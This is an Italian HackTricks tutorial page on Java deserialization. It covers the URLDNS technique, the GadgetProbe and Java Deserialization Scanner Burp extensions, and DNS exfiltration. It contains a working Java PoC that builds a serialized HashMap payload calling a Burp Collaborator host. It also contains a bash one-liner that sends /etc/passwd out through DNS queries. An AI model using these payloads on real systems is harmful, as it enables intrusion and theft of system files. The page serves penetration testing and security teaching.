# Java DNS Deserialization, GadgetProbe e Java Deserialization Scanner

<details>

<summary><strong>Impara l'hacking di AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Altri modi per supportare HackTricks:

* Se vuoi vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PACCHETTI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [**NFT**](https://opensea.io/collection/the-peass-family)
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR ai repository github di** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Richiesta DNS su deserializzazione

La classe `java.net.URL` implementa `Serializable`, ciò significa che questa classe può essere serializzata.
```java
public final class URL implements java.io.Serializable {
```
Questa classe ha un comportamento curioso. Dalla documentazione: "**Due host sono considerati equivalenti se entrambi i nomi host possono essere risolti negli stessi indirizzi IP**".\
Quindi, ogni volta che un oggetto URL chiama una delle funzioni **`equals`** o **`hashCode`**, verrà inviata una richiesta DNS per ottenere l'indirizzo IP.

Chiamare la funzione **`hashCode`** da un oggetto URL è abbastanza semplice, è sufficiente inserire questo oggetto all'interno di una `HashMap` che verrà deserializzata. Questo perché alla fine della funzione **`readObject`** di `HashMap` viene eseguito il seguente codice:
```java
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}
```
Il codice **eseguirà** `putVal` con ogni valore all'interno dell'`HashMap`. Ma, ancora più rilevante è la chiamata a `hash` con ogni valore. Questo è il codice della funzione `hash`:
```java
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
Come puoi osservare, **quando si deserializza** una **`HashMap`**, la funzione `hash` verrà **eseguita con ogni oggetto** e **durante** l'esecuzione di **`hash`** verrà eseguito `.hashCode()` dell'oggetto. Pertanto, se si deserializza una **`HashMap`** che contiene un oggetto **URL**, l'oggetto **URL** eseguirà `.hashCode()`.

Ora, diamo un'occhiata al codice di `URLObject.hashCode()` :
```java
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;
```
Come puoi vedere, quando un `URLObject` esegue `.hashCode()`, viene chiamato `hashCode(this)`. Di seguito puoi vedere il codice di questa funzione:
```java
protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]
```
È possibile notare che viene eseguito un `getHostAddress` sul dominio, **lanciando una query DNS**.

Pertanto, questa classe può essere **abusata** per **lanciare** una **query DNS** al fine di **dimostrare** che la **deserializzazione** è possibile, o addirittura per **esfiltrare informazioni** (è possibile aggiungere come sottodominio l'output di un'esecuzione di comando).

### Esempio di codice payload URLDNS

È possibile trovare il [codice payload URLDNS di ysoserial qui](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). Tuttavia, solo per rendere più facile la comprensione di come codificarlo, ho creato il mio PoC (basato su quello di ysoserial):
```java
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
```
### Ulteriori informazioni

* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
* Nell'idea originale il payload delle collezioni comuni è stato modificato per eseguire una query DNS, ma questo metodo è meno affidabile rispetto al metodo proposto, ma questo è il post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)

## GadgetProbe

Puoi scaricare [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) dall'App Store di Burp Suite (Extender).

**GadgetProbe** cercherà di capire se alcune **classi Java esistono** nella classe Java del server in modo da poter sapere **se** è **vulnerabile** a qualche exploit noto.

### Come funziona

**GadgetProbe** utilizzerà lo stesso **payload DNS della sezione precedente**, ma **prima** di eseguire la query DNS, proverà a deserializzare una classe arbitraria. Se l'**arbitrary class esiste**, la **query DNS** verrà **inviata** e GadgetProbe noterà che questa classe esiste. Se la **richiesta DNS non viene mai inviata**, ciò significa che l'**arbitrary class non è stata deserializzata** con successo, quindi o non è presente o non è **serializzabile/sfruttabile**.

All'interno di GitHub, [**GadgetProbe ha alcune wordlist**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) con classi Java da testare.

![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)

### Ulteriori informazioni

* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)

## Java Deserialization Scanner

Questo scanner può essere **scaricato** dall'App Store di Burp (**Extender**).\
L'estensione ha **funzionalità passive** e **attive**.

### Passive

Per impostazione predefinita, **controlla passivamente** tutte le richieste e le risposte inviate **cercando** i **magic bytes serializzati di Java** e presenterà un avviso di vulnerabilità se ne viene trovato uno:

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/image (290).png>)

### Attive

**Testing manuale**

È possibile selezionare una richiesta, fare clic con il pulsante destro del mouse e `Invia richiesta a DS - Testing manuale`.\
Quindi, all'interno della scheda _Deserialization Scanner_ --> _Scheda di testing manuale_ è possibile selezionare il **punto di inserimento**. E **avviare il testing** (Selezionare l'attacco appropriato a seconda della codifica utilizzata).

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../.gitbook/assets/3-1.png)

Anche se questo viene chiamato "Testing manuale", è abbastanza **automatizzato**. Verificherà automaticamente se la **deserializzazione** è **vulnerabile** a **qualsiasi payload ysoserial** controllando le librerie presenti sul server web e evidenzierà quelle vulnerabili. Per **verificare** le **librerie vulnerabili**, è possibile selezionare di lanciare **Javas Sleeps**, **sleeps** tramite **consumo di CPU**, o utilizzando **DNS** come precedentemente menzionato.

**Sfruttamento**

Una volta identificata una libreria vulnerabile, è possibile inviare la richiesta alla scheda _Exploiting_.\
In questa scheda è necessario **selezionare** nuovamente il **punto di iniezione**, scrivere la **libreria vulnerabile** per la quale si desidera creare un payload e il **comando**. Quindi, basta premere il pulsante **Attack** appropriato.

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../.gitbook/assets/4 (1).png>)

### Informazioni su Java Deserialization DNS Exfil

Fai in modo che il tuo payload esegua qualcosa come quanto segue:
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
### Ulteriori informazioni

* [https://techblog.mediaservice.net/2017/05/scoperta-affidabile-e-sfruttamento-di-vulnerabilita-di-deserializzazione-java/](https://techblog.mediaservice.net/2017/05/scoperta-affidabile-e-sfruttamento-di-vulnerabilita-di-deserializzazione-java/)

<details>

<summary><strong>Impara l'hacking di AWS da zero a eroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Altri modi per supportare HackTricks:

* Se vuoi vedere la tua **azienda pubblicizzata in HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)!
* Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com)
* Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di esclusive [**NFT**](https://opensea.io/collection/the-peass-family)
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Condividi i tuoi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repository di github.

</details>